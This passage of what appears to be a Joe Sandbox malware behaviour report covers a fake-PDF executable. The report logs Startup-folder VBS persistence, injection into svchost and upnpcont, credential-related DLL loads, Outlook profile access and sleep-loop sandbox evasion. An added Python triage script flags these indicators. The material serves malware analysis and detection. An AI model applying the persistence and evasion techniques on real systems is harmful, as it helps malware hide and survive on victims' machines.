                    Source: C:\Windows\SysWOW64\upnpcont.exe | Section loaded: vaultcli.dll
                    Source: C:\Windows\SysWOW64\upnpcont.exe | Section loaded: wintypes.dll
                    Source: C:\Windows\SysWOW64\upnpcont.exe | Section loaded: dpapi.dll
                    Source: C:\Windows\SysWOW64\upnpcont.exe | Section loaded: cryptbase.dll
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe | Section loaded: wininet.dll
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe | Section loaded: mswsock.dll
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe | Section loaded: dnsapi.dll
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe | Section loaded: iphlpapi.dll
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe | Section loaded: fwpuclnt.dll
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe | Section loaded: rasadhlp.dll
                    Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
                    Source: Window Recorder | Window detected: More than 3 window changes detected
                    Source: C:\Windows\SysWOW64\upnpcont.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                    Source: 5674656777985-069688574654 pdf.exe | Static file information: File size 1189888 > 1048576
                    Source: 5674656777985-069688574654 pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                    Source: 5674656777985-069688574654 pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                    Source: 5674656777985-069688574654 pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                    Source: 5674656777985-069688574654 pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: 5674656777985-069688574654 pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                    Source: 5674656777985-069688574654 pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                    Source: 5674656777985-069688574654 pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XzXxPWzavnqD.exe, 00000009.00000002.3082674785.00000000005FE000.00000002.00000001.01000000.00000007.sdmp, XzXxPWzavnqD.exe, 0000000B.00000002.3082673027.00000000005FE000.00000002.00000001.01000000.00000007.sdmp
                    Source: Binary string: wntdll.pdbUGP source: cunila.exe, 00000001.00000003.1858219698.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, cunila.exe, 00000001.00000003.1858872105.0000000003D20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2321934213.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2321934213.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202865425.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2200514359.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, cunila.exe, 00000004.00000003.1987627802.0000000004260000.00000004.00001000.00020000.00000000.sdmp, cunila.exe, 00000004.00000003.1987959850.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2341833103.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2334643348.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2341833103.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2332161494.0000000003300000.00000004.00000020.00020000.00000000.sdmp, upnpcont.exe, 0000000A.00000002.3084702957.0000000002E4E000.00000040.00001000.00020000.00000000.sdmp, upnpcont.exe, 0000000A.00000003.2321495418.0000000002955000.00000004.00000020.00020000.00000000.sdmp, upnpcont.exe, 0000000A.00000002.3084702957.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, upnpcont.exe, 0000000A.00000003.2334099482.0000000002B03000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: cunila.exe, 00000001.00000003.1858219698.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, cunila.exe, 00000001.00000003.1858872105.0000000003D20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2321934213.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2321934213.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202865425.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2200514359.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, cunila.exe, 00000004.00000003.1987627802.0000000004260000.00000004.00001000.00020000.00000000.sdmp, cunila.exe, 00000004.00000003.1987959850.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2341833103.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2334643348.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2341833103.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2332161494.0000000003300000.00000004.00000020.00020000.00000000.sdmp, upnpcont.exe, 0000000A.00000002.3084702957.0000000002E4E000.00000040.00001000.00020000.00000000.sdmp, upnpcont.exe, 0000000A.00000003.2321495418.0000000002955000.00000004.00000020.00020000.00000000.sdmp, upnpcont.exe, 0000000A.00000002.3084702957.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, upnpcont.exe, 0000000A.00000003.2334099482.0000000002B03000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: upnpcont.pdbGCTL source: svchost.exe, 00000002.00000003.2285675652.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, XzXxPWzavnqD.exe, 00000009.00000002.3083435571.0000000001187000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: svchost.pdb source: upnpcont.exe, 0000000A.00000002.3085844190.00000000032DC000.00000004.10000000.00040000.00000000.sdmp, upnpcont.exe, 0000000A.00000002.3083101418.0000000002862000.00000004.00000020.00020000.00000000.sdmp, XzXxPWzavnqD.exe, 0000000B.00000002.3084807693.000000000307C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.2626466045.000000003CC3C000.00000004.80000000.00040000.00000000.sdmp
                    Source: Binary string: svchost.pdbUGP source: upnpcont.exe, 0000000A.00000002.3085844190.00000000032DC000.00000004.10000000.00040000.00000000.sdmp, upnpcont.exe, 0000000A.00000002.3083101418.0000000002862000.00000004.00000020.00020000.00000000.sdmp, XzXxPWzavnqD.exe, 0000000B.00000002.3084807693.000000000307C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.2626466045.000000003CC3C000.00000004.80000000.00040000.00000000.sdmp
                    Source: Binary string: upnpcont.pdb source: svchost.exe, 00000002.00000003.2285675652.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, XzXxPWzavnqD.exe, 00000009.00000002.3083435571.0000000001187000.00000004.00000020.00020000.00000000.sdmp
                    Source: 5674656777985-069688574654 pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                    Source: 5674656777985-069688574654 pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                    Source: 5674656777985-069688574654 pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                    Source: 5674656777985-069688574654 pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                    Source: 5674656777985-069688574654 pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_0035E01E LoadLibraryA,GetProcAddress,0_2_0035E01E
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_0036C09E push esi; ret 0_2_0036C0A0
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_0036C187 push edi; ret 0_2_0036C189
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_003AC8BC push esi; ret 0_2_003AC8BE
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_00366B05 push ecx; ret 0_2_00366B18
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_0038B2B1 push FFFFFF8Bh; iretd 0_2_0038B2B3
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_0036BDAA push edi; ret 0_2_0036BDAC
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_0036BEC3 push esi; ret 0_2_0036BEC5
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_00D0C09E push esi; ret 1_2_00D0C0A0
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_00D0C187 push edi; ret 1_2_00D0C189
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_00D5C498 push ds; iretd 1_2_00D5C4A6
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_00D5C444 push ds; iretd 1_2_00D5C452
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_00D4C8BC push esi; ret 1_2_00D4C8BE
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_00CF2857 push ds; iretd 1_2_00CF285A
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_00CF2959 push 2700CF1Fh; iretd 1_2_00CF2971
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_00CF2919 push ds; iretd 1_2_00CF291A
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_00CF2915 push ds; iretd 1_2_00CF2916
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_00CF2910 push ebx; iretd 1_2_00CF2911
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_00D5AA42 push cs; iretd 1_2_00D5AA48
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_00D5AA62 push cs; iretd 1_2_00D5AA68
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_00D5AA6F push cs; iretd 1_2_00D5AA74
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_00D5AA6B push cs; iretd 1_2_00D5AA6C
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_00D5AA3F push cs; iretd 1_2_00D5AA40
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_00D06B05 push ecx; ret 1_2_00D06B18
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_00D2B2B1 push FFFFFF8Bh; iretd 1_2_00D2B2B3
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_00CFF25C push 8C00CFF2h; iretd 1_2_00CFF261
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_00D0BDAA push edi; ret 1_2_00D0BDAC
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_00D0BEC3 push esi; ret 1_2_00D0BEC5
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004032D0 push eax; ret 2_2_004032D2
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041847D push esi; retf 2_2_0041847E
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00418496 push esi; ret 2_2_00418497
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041450B push edi; iretd 2_2_0041450F
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | File created: C:\Users\user\AppData\Local\retrofit\cunila.exe

                    Boot Survival

                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_003A8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_003A8111
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_0035EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0035EB42
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_00D48111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,1_2_00D48111
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_00CFEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,1_2_00CFEB42
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_0036123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0036123A
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\upnpcont.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\upnpcont.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\upnpcont.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\upnpcont.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\upnpcont.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | API/Special instruction interceptor: Address: 147EFD4
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | API/Special instruction interceptor: Address: 1984014
                    Source: C:\Windows\SysWOW64\upnpcont.exe | API/Special instruction interceptor: Address: 7FFE2220D324
                    Source: C:\Windows\SysWOW64\upnpcont.exe | API/Special instruction interceptor: Address: 7FFE2220D7E4
                    Source: C:\Windows\SysWOW64\upnpcont.exe | API/Special instruction interceptor: Address: 7FFE2220D944
                    Source: C:\Windows\SysWOW64\upnpcont.exe | API/Special instruction interceptor: Address: 7FFE2220D504
                    Source: C:\Windows\SysWOW64\upnpcont.exe | API/Special instruction interceptor: Address: 7FFE2220D544
                    Source: C:\Windows\SysWOW64\upnpcont.exe | API/Special instruction interceptor: Address: 7FFE2220D1E4
                    Source: C:\Windows\SysWOW64\upnpcont.exe | API/Special instruction interceptor: Address: 7FFE22210154
                    Source: C:\Windows\SysWOW64\upnpcont.exe | API/Special instruction interceptor: Address: 7FFE2220DA44
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0327096E rdtsc 2_2_0327096E
                    Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
                    Source: C:\Windows\SysWOW64\upnpcont.exe | Window / User API: threadDelayed 4066
                    Source: C:\Windows\SysWOW64\upnpcont.exe | Window / User API: threadDelayed 5907
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Evaded block: after key decision (graph_0-94114)
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Evaded block: after key decision (graph_0-93140)
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Evaded block: after key decision
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Evaded block: after key decision
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes (graph_0-93585)
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | API coverage: 4.4 %
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | API coverage: 4.7 %
                    Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.7 %
                    Source: C:\Windows\SysWOW64\upnpcont.exe TID: 7928 | Thread sleep count: 4066 > 30
                    Source: C:\Windows\SysWOW64\upnpcont.exe TID: 7928 | Thread sleep time: -8132000s >= -30000s
                    Source: C:\Windows\SysWOW64\upnpcont.exe TID: 7928 | Thread sleep count: 5907 > 30
                    Source: C:\Windows\SysWOW64\upnpcont.exe TID: 7928 | Thread sleep time: -11814000s >= -30000s
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe TID: 7952 | Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\SysWOW64\upnpcont.exe | Last function: Thread delayed
                    Source: C:\Windows\SysWOW64\upnpcont.exe | Last function: Thread delayed
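                    Three of the entries in this report are the ones a responder triages first: svchost.exe and upnpcont.exe started with another executable's command line (the image path and the quoted command line name different binaries, the footprint of the process hollowing the signatures above call "Maps a DLL or memory area into another process"), cunila.vbs dropped into the per-user Start Menu Startup folder (Boot Survival), and a thread in upnpcont.exe that sleeps thousands of times (the sleep count and sleep time lines). The script below is an added example and is not part of the Joe Sandbox report or its tooling: it parses behaviour lines in the flattened "Source: ... | behaviour: detail" form over constructed sample lines modelled on this report, and flags each of those three indicators. The 30-sleep and 30000 thresholds are the report's own; reading the sleep-time figure as milliseconds (so 8132000 / 4066 = 2000, a 2 s NtDelayExecution loop) is an assumption, and the rule names are ours.

```python
"""Added triage script (not from the Joe Sandbox report): parse flattened
"Source: <process> [TID: n] | <kind>: <detail>" lines and flag three indicators:
  1. Process created where the image and the quoted command line name different
     executables (system binary launched under the dropper's command line).
  2. File created under the per-user Start Menu Startup folder with an
     auto-run extension (script or executable persistence).
  3. Thread sleep loops over the report's own thresholds, pairing each
     "sleep count" line with the following "sleep time" line for that thread.
"""
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample lines modelled on the report entries, not a verbatim export.
SAMPLE_LINES = [
    r'Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\retrofit\cunila.exe"',
    r'Source: C:\Windows\SysWOW64\upnpcont.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"',
    r'Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs',
    r'Source: C:\Users\user\Desktop\sample.exe | File created: C:\Users\user\AppData\Local\retrofit\cunila.exe',
    r'Source: C:\Windows\SysWOW64\upnpcont.exe TID: 7928 | Thread sleep count: 4066 > 30',
    r'Source: C:\Windows\SysWOW64\upnpcont.exe TID: 7928 | Thread sleep time: -8132000s >= -30000s',
    r'Source: C:\Program Files (x86)\XzXxPWzavnqD.exe TID: 7952 | Thread sleep time: -30000s >= -30000s',
]

LINE_RE = re.compile(r'^Source: (?P<source>.+?)(?: TID: (?P<tid>\d+))? \| (?P<kind>[^:|]+): (?P<detail>.*)$')
PROC_RE = re.compile(r'^(?P<image>.+?) "(?P<cmdline>.*)"$')
COUNT_RE = re.compile(r'^(\d+) > \d+$')
TIME_RE = re.compile(r'^-(\d+)s >= -\d+s$')
STARTUP_DIR = '\\start menu\\programs\\startup\\'
AUTORUN_EXTS = ('.vbs', '.vbe', '.js', '.jse', '.wsf', '.hta', '.bat', '.cmd', '.ps1', '.lnk', '.exe')
SLEEP_COUNT_MIN, SLEEP_TIME_MIN = 30, 30000   # the report's own thresholds


@dataclass(frozen=True)
class Finding:
    rule: str
    source: str
    detail: str


def parse_line(line: str):
    """Split one flattened report line into source, optional TID, kind and detail."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def basename(path: str) -> str:
    return path.rsplit('\\', 1)[-1].lower()


def argv0(cmdline: str) -> str:
    """The report quotes the whole command line and paths contain spaces, so cut at
    the first '.exe' rather than the first space (heuristic, adequate for this data)."""
    i = cmdline.lower().find('.exe')
    return cmdline[:i + 4] if i >= 0 else cmdline.split(' ', 1)[0]


def check_process_created(source: str, detail: str):
    m = PROC_RE.match(detail)
    if not m:
        return None
    image, started_as = basename(m['image']), basename(argv0(m['cmdline']))
    if image != started_as:
        return Finding('image_cmdline_mismatch', source, f'{image} run as {started_as}')
    return None


def check_file_created(source: str, path: str):
    low = path.lower()
    if STARTUP_DIR in low and low.endswith(AUTORUN_EXTS):
        return Finding('startup_folder_persistence', source, path)
    return None


def per_sleep_delay(count, total):
    """Delay per sleep call in the report's units (assumed ms: 8132000 / 4066 = 2000)."""
    return total // count if count and total else None


def analyse(lines):
    findings = []
    sleeps = defaultdict(list)   # (source, tid) -> [[count, total], ...] in report order
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        kind, src, detail, key = rec['kind'], rec['source'], rec['detail'], (rec['source'], rec['tid'])
        f = None
        if kind == 'Process created':
            f = check_process_created(src, detail)
        elif kind == 'File created':
            f = check_file_created(src, detail)
        elif kind == 'Thread sleep count' and (m := COUNT_RE.match(detail)):
            sleeps[key].append([int(m[1]), None])
        elif kind == 'Thread sleep time' and (m := TIME_RE.match(detail)):
            pairs = sleeps[key]
            if pairs and pairs[-1][1] is None:
                pairs[-1][1] = int(m[1])          # pairs with the preceding count line
            else:
                pairs.append([None, int(m[1])])   # time line with no count line before it
        if f:
            findings.append(f)
    for (src, tid), pairs in sleeps.items():
        for count, total in pairs:
            if (count or 0) > SLEEP_COUNT_MIN or (total or 0) >= SLEEP_TIME_MIN:
                findings.append(Finding('sleep_loop_evasion', f'{src} TID {tid}',
                                        f'count={count} total={total} per_sleep={per_sleep_delay(count, total)}'))
    return findings


if __name__ == '__main__':
    for f in analyse(SAMPLE_LINES):
        print(f'[{f.rule}] {f.source}: {f.detail}')
```

                    The image/command-line comparison is the same check one writes against Sysmon event 1 (Image versus the first token of CommandLine); the firefox.exe line passes because the comparison is case-insensitive. Pairing the count and time lines for TID 7928 gives a per-sleep delay of 2000, which is why a sandbox that shortens sleeps records thousands of calls from one thread.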
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_00386CA9 GetFileAttributesW,FindFirstFileW,FindClose, | 0_2_00386CA9
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_003860DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, | 0_2_003860DD
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_003863F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, | 0_2_003863F9
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_0038EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, | 0_2_0038EB60
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_0038F56F FindFirstFileW,FindClose, | 0_2_0038F56F
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_0038F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, | 0_2_0038F5FA
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_00391B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, | 0_2_00391B2F
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_00391C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, | 0_2_00391C8A
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_00391F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, | 0_2_00391F94
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_00D26CA9 GetFileAttributesW,FindFirstFileW,FindClose, | 1_2_00D26CA9
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_00D260DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, | 1_2_00D260DD
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_00D263F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, | 1_2_00D263F9
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_00D2EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, | 1_2_00D2EB60
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_00D2F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, | 1_2_00D2F5FA
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_00D2F56F FindFirstFileW,FindClose, | 1_2_00D2F56F
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_00D31B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, | 1_2_00D31B2F
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_00D31C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, | 1_2_00D31C8A
